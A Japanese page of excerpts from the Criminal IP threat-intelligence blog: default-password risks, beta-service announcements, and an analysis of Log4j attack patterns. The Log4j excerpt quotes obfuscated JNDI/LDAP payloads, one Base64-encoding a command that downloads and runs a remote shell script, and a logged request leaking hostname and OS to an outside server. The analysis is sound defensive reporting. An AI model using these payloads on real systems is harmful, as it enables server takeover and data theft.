Default Password 状態で放置されたシステムのセキュリティ脅威

Default Password とはデバイスや OS などで基本的に設定されたパスワードを意味します。このような デフォルト パスワード はインターネットやマニュアルで公開される可能性が 高く、初めて設定を行う際はセキュリティのため、アカウント情報を変更しなければなりません。デフォルト パスワードを変更せず使っている場合、デフォルト パスワードを知っている誰でもログインができ、潜在的なサイバー攻撃にとても脆弱になりえるためです。さらに、機密情報を盗むなどハッキングやクラッキングの脅威が発生したりする可能性も高くなります。 このように デフォルト パスワードの変更はサイバーセキュリティで基本的かつ重要な 案件です。内部管理者ページまたはシステムでのみ共有されるはずのデフォルト パスワードが漏洩される場合、漏洩されたアカウント情報を 悪用するサイバー攻撃が 起こるかもしれません。Criminal IP のキーワード検索と title

アップデートの案内]ドメイン検索機能の追加及び収集されたバグのパッチ案内

2022年4月28日に開始されたサイバー脅威検索エンジン Criminal IP の無料ベータ版サービスが順調に進んでいます。事前登録いただいた約2千名のテスターとベータ版サービスの開始後に登録いただいた方々に感謝の言葉をお伝えします。 無料ベータ版サービスを見る   取集されたバグレポートのパッチ案内 約2週間のベータ版サービスの間、当社が発見できなかった Criminal IP のさまざまなバグレポートが収集されました。サービスの改善にご協力いただき誠にありがとうございます。現在、Criminal IP QA ticket system で提供していただいたバグが収集されており、技術チームがすべてのバグを修正しております。収集されたバグは今週中に修正され、パッチされる予定です。   新しい機能が追加されます!ドメイン検索のリリース案内 そして、多くの方々が期待しているドメイン検索機能が2週間以内にリリースされる予定です。現在、安定化テストは仕上げ段階にあり、もうすぐ Criminal

[お知らせ] グローバルベータ版サービス開始 !

[お知らせ] グローバルベータ版サービス開始 ! Criminal IP のベータ版テスター募集が4月27日に終了し、多くの関心と期待と共に事前登録とウェブページへの訪問いただいた 82国の数千人のベータ版テスターに感謝申し上げます。盛況のうちにベータ版テスターの募集を終了致しまして嬉しい思いを込めて、事前登録ページや技術ブログ、SNSチャンネルなどを訪問してくださって熱心な声援を送ってくださったお客様にも心から感謝の言葉をお届けします。4月6日から始まった事前登録に数千人の利用者が登録していただき、これからもベータ版サービスを利用するユーザーは益々増える見込みです。新しく改装された当社の Criminal IP ベータ版サービスについて、改めてご紹介いたします。 ▶無料ベータ版サービスを見る◀   ベータ版サービスの概要 Criminal IP は既にさまざまな業界で検証された活用性をもとに、グローバル B2C バージョンをリリースしてサイバーセキュリティに関心を持っている個人も脅威インテリジェンスベースの検索エンジンを使用できるように開発されました。これまでは、企業向けの B2B 形態で提供されていた

Criminal IP オープン! ベータ版サービスの事前登録、D-1!

Criminal IP オープン! ベータ版サービスの事前登録、D-1! こんにちは!グローバルサイバー脅威インテリジェンス検索エンジン Criminal IP が4月28日、明日最後にベータ版テスターの募集を終了致します。現在、AIスペラで2022年、新しく披露するCriminal IP グローバルベータ版サービスの事前登録が仕上げに向かって盛況裏に進めており、24時間以内に事前登録し、追加無料ライセンスの特典をもらいましょう。 Criminal IPは世界中のIPアドレスに対するサイバー脅威インテリジェンス(Cyber Threat Intelligence)情報を提供する検索エンジンサービスです。企業や個人のITセキュリティのための総合検索エンジンで、IPアドレスに基づいてインターネットに接続されたすべての資産に対する可視性を確保し、DBサーバー、ファイルサーバー、ミドルウェアサーバー、IPアドレスに関するすべてのドメイン情報まで一か所で照会できます。世界で最初に出てきたフィッシングドメインと悪意のあるURLもCriminal IPのドメイン検索で検索すると、リアルタイムですべてのドメイン情報をスキャンし、脅威の程度を判断できます。現在、さらにアップグレードされたドメイン検索機能を提供するために研究を続けており、今後、より豊富なデータセットを提供するドメイン検索機能を近いうちに、ご利用いただけます。 このようにAIと機械学習技術を組み合わせて、すべてのIPアドレスとドメインのリスクを直観的な5段階に分類し、提供するため、潜在的な脅威の特定と先制的な対応が可能です。Criminal IPの全データにアクセスできるエンジニア向けのAPIと連動すると、VPN、TOR、PROXYなどの脅威IPのブロック、IT資産に対する攻撃対象領域管理(Attack Surface Management)まで可能になります。 Criminal

Criminal IPで分析したLog4jの攻撃パターン

Log4jの脆弱性が世界を襲った。ハッカーは、サーバーを丸ごと奪うためにLog4jの脆弱性に感染されたサーバーを見つけ、世界中のすべてのサーバーを毎日スキャンしています。ハッカーがlog4jの脆弱性を持っているサーバーを見つけるためにどのスキャン技術を使用しているかを調べました。 攻撃者は最も単純な方法で "${jndi:ldap://***.*.**.***:53/c}" パケットを送信し、サーバーの反応を調べます。しかし、このパターンはメディアなどにあまりにも多く公開されてきており、IDS・IPSで素早く検出されてブロックされています。したがって、下表のような変形した攻撃が使用されています。変更された攻撃パケットは、jndi:ldap のシグネチャを検出しないように j}ndi, {${::-j}${::-n}${::-d}${::-i}:${ ::-l}${::-d}${::-a}${::-p}, ${jndi:${lower:l}${lower:d}a${lower:p} などの形でペイロードを分割して送信する方法を使用します。   Log4jの一般的な攻撃パターン  ""t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//***.**.**.***:2420/TomcatBypass/Command/Base64/d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pdC5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOyBybSAtcmYgRXhwbG9pdC5zaA==}')"" ""t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//***.**.**.***:2420/TomcatBypass/Command/Base64/d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pdC5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOyBybSAtcmYgRXhwbG9pdC5zaA==}')"" 8080" "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F45.12.32.61%3A1389%2FOS%3D%24%7Bsys%3Aos.name%7D%2FHN%3D%24%7Benv%3AHOSTNAME%7D%2Ffeb12a13-5fe3-429a-bd12-ed0c72e2ad20%7D HTTP/1.1"" 403 152

Go to Top